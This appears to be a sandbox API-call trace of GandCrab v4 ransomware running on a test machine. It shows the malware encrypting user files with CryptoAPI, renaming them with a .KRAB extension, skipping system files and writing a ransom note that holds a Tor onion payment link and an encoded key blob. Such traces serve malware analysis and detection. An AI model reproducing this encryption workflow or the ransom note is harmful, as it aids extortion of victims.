[0057.267] lstrcmpiW (lpString1="e-ADlMBN_O.mp4", lpString2="autorun.inf") returned 1 [0057.267] lstrcmpiW (lpString1="e-ADlMBN_O.mp4", lpString2="ntuser.dat") returned -1 [0057.267] lstrcmpiW (lpString1="e-ADlMBN_O.mp4", lpString2="iconcache.db") returned -1 [0057.268] lstrcmpiW (lpString1="e-ADlMBN_O.mp4", lpString2="bootsect.bak") returned 1 [0057.268] lstrcmpiW (lpString1="e-ADlMBN_O.mp4", lpString2="boot.ini") returned 1 [0057.268] lstrcmpiW (lpString1="e-ADlMBN_O.mp4", lpString2="ntuser.dat.log") returned -1 [0057.268] lstrcmpiW (lpString1="e-ADlMBN_O.mp4", lpString2="thumbs.db") returned -1 [0057.268] lstrcmpiW (lpString1="e-ADlMBN_O.mp4", lpString2="KRAB-DECRYPT.html") returned -1 [0057.268] lstrcmpiW (lpString1="e-ADlMBN_O.mp4", lpString2="KRAB-DECRYPT.txt") returned -1 [0057.268] lstrcmpiW (lpString1="e-ADlMBN_O.mp4", lpString2="CRAB-DECRYPT.txt") returned 1 [0057.268] lstrcmpiW (lpString1="e-ADlMBN_O.mp4", lpString2="ntldr") returned -1 [0057.268] lstrcmpiW (lpString1="e-ADlMBN_O.mp4", lpString2="NTDETECT.COM") returned -1 [0057.268] lstrcmpiW (lpString1="e-ADlMBN_O.mp4", lpString2="Bootfont.bin") returned 1 [0057.268] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.268] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbca08) returned 1 [0057.269] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0057.269] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.269] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.269] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0057.269] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.269] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.270] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbca08) returned 1 [0057.270] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0057.270] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.271] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.271] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0057.271] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.271] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.271] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbca08) returned 1 [0057.272] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd860) returned 1 [0057.272] CryptGetKeyParam (in: hKey=0xfbd860, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0057.272] CryptEncrypt (in: hKey=0xfbd860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0057.272] GetLastError () returned 0x0 [0057.272] CryptDestroyKey (hKey=0xfbd860) returned 1 [0057.272] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.272] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbca08) returned 1 [0057.273] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd4a0) returned 1 [0057.273] CryptGetKeyParam (in: hKey=0xfbd4a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0057.273] CryptEncrypt (in: hKey=0xfbd4a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0057.273] GetLastError () returned 0x0 [0057.273] CryptDestroyKey (hKey=0xfbd4a0) returned 1 [0057.273] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.273] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\e-ADlMBN_O.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\e-adlmbn_o.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0057.274] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0057.274] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0057.274] ReadFile (in: hFile=0x43c, lpBuffer=0x35f0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x35f0000*, lpNumberOfBytesRead=0x338ef7c*=0x8c41, lpOverlapped=0x0) returned 1 [0057.288] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffff73bf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.288] WriteFile (in: hFile=0x43c, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x8c41, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ef78*=0x8c41, lpOverlapped=0x0) returned 1 [0057.288] WriteFile (in: hFile=0x43c, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0057.288] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.292] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.294] CloseHandle (hObject=0x43c) returned 1 [0057.297] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.298] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\e-ADlMBN_O.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\e-adlmbn_o.mp4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\e-ADlMBN_O.mp4.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\e-adlmbn_o.mp4.krab")) returned 1 [0057.298] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.299] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0057.299] lstrcmpW (lpString1="FupPB_5g.gif", lpString2=".") returned 1 [0057.299] lstrcmpW (lpString1="FupPB_5g.gif", lpString2="..") returned 1 [0057.299] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="FupPB_5g.gif" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\FupPB_5g.gif") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\FupPB_5g.gif" [0057.299] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.299] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\FupPB_5g.gif.KRAB") returned 55 [0057.299] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\FupPB_5g.gif") returned 50 [0057.299] lstrlenW (lpString=".gif") returned 4 [0057.299] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.299] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".gif ") returned 5 [0057.299] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.300] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\FupPB_5g.gif") returned 50 [0057.300] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\FupPB_5g.gif") returned 50 [0057.300] lstrcmpiW (lpString1="FupPB_5g.gif", lpString2="desktop.ini") returned 1 [0057.300] lstrcmpiW (lpString1="FupPB_5g.gif", lpString2="autorun.inf") returned 1 [0057.300] lstrcmpiW (lpString1="FupPB_5g.gif", lpString2="ntuser.dat") returned -1 [0057.300] lstrcmpiW (lpString1="FupPB_5g.gif", lpString2="iconcache.db") returned -1 [0057.300] lstrcmpiW (lpString1="FupPB_5g.gif", lpString2="bootsect.bak") returned 1 [0057.300] lstrcmpiW (lpString1="FupPB_5g.gif", lpString2="boot.ini") returned 1 [0057.300] lstrcmpiW (lpString1="FupPB_5g.gif", lpString2="ntuser.dat.log") returned -1 [0057.300] lstrcmpiW (lpString1="FupPB_5g.gif", lpString2="thumbs.db") returned -1 [0057.300] lstrcmpiW (lpString1="FupPB_5g.gif", lpString2="KRAB-DECRYPT.html") returned -1 [0057.300] lstrcmpiW (lpString1="FupPB_5g.gif", lpString2="KRAB-DECRYPT.txt") returned -1 [0057.300] lstrcmpiW (lpString1="FupPB_5g.gif", lpString2="CRAB-DECRYPT.txt") returned 1 [0057.300] lstrcmpiW (lpString1="FupPB_5g.gif", lpString2="ntldr") returned -1 [0057.300] lstrcmpiW (lpString1="FupPB_5g.gif", lpString2="NTDETECT.COM") returned -1 [0057.300] lstrcmpiW (lpString1="FupPB_5g.gif", lpString2="Bootfont.bin") returned 1 [0057.300] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.300] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbca08) returned 1 [0057.301] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0057.301] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.301] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.301] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0057.302] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.302] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.302] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0xfbca08) returned 1 [0057.302] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0057.303] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.303] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.303] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0057.303] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.303] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.303] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbca08) returned 1 [0057.305] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd2e0) returned 1 [0057.305] CryptGetKeyParam (in: hKey=0xfbd2e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0057.305] CryptEncrypt (in: hKey=0xfbd2e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0057.305] GetLastError () returned 0x0 [0057.305] CryptDestroyKey (hKey=0xfbd2e0) returned 1 [0057.305] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.305] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0xfbca08) returned 1 [0057.306] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd960) returned 1 [0057.306] CryptGetKeyParam (in: hKey=0xfbd960, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0057.306] CryptEncrypt (in: hKey=0xfbd960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0057.306] GetLastError () returned 0x0 [0057.306] CryptDestroyKey (hKey=0xfbd960) returned 1 [0057.306] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0057.306] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\FupPB_5g.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\fuppb_5g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0057.306] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0057.307] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0057.307] ReadFile (in: hFile=0x43c, lpBuffer=0x35f0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x35f0000*, lpNumberOfBytesRead=0x338ef7c*=0x5a16, lpOverlapped=0x0) returned 1 [0057.320] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffa5ea, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.321] WriteFile (in: hFile=0x43c, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x5a16, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ef78*=0x5a16, lpOverlapped=0x0) returned 1 [0057.321] WriteFile (in: hFile=0x43c, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0057.321] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.325] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.325] CloseHandle (hObject=0x43c) returned 1 [0057.326] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.327] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\FupPB_5g.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\fuppb_5g.gif"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\FupPB_5g.gif.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\fuppb_5g.gif.krab")) returned 1 [0057.329] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.330] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0057.330] lstrcmpW (lpString1="Identities", lpString2=".") returned 1 [0057.330] lstrcmpW (lpString1="Identities", lpString2="..") returned 1 [0057.330] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="Identities" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities" [0057.330] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\" [0057.330] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0057.330] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0057.330] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0057.330] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0057.330] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0057.330] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.330] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.331] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\\\KRAB-DECRYPT.txt") returned 66 [0057.331] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\identities\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0057.331] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0057.331] WriteFile (in: hFile=0x43c, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338ed20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338ed20*=0x1f6e, lpOverlapped=0x0) returned 1 [0057.332] CloseHandle (hObject=0x43c) returned 1 [0057.332] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.333] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.333] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x4, wMilliseconds=0x212)) [0057.333] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.334] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0057.334] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0057.334] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\d2ca4a08d2ca4dee3d.lock") returned 72 [0057.334] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Identities\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\identities\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x43c [0057.337] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, 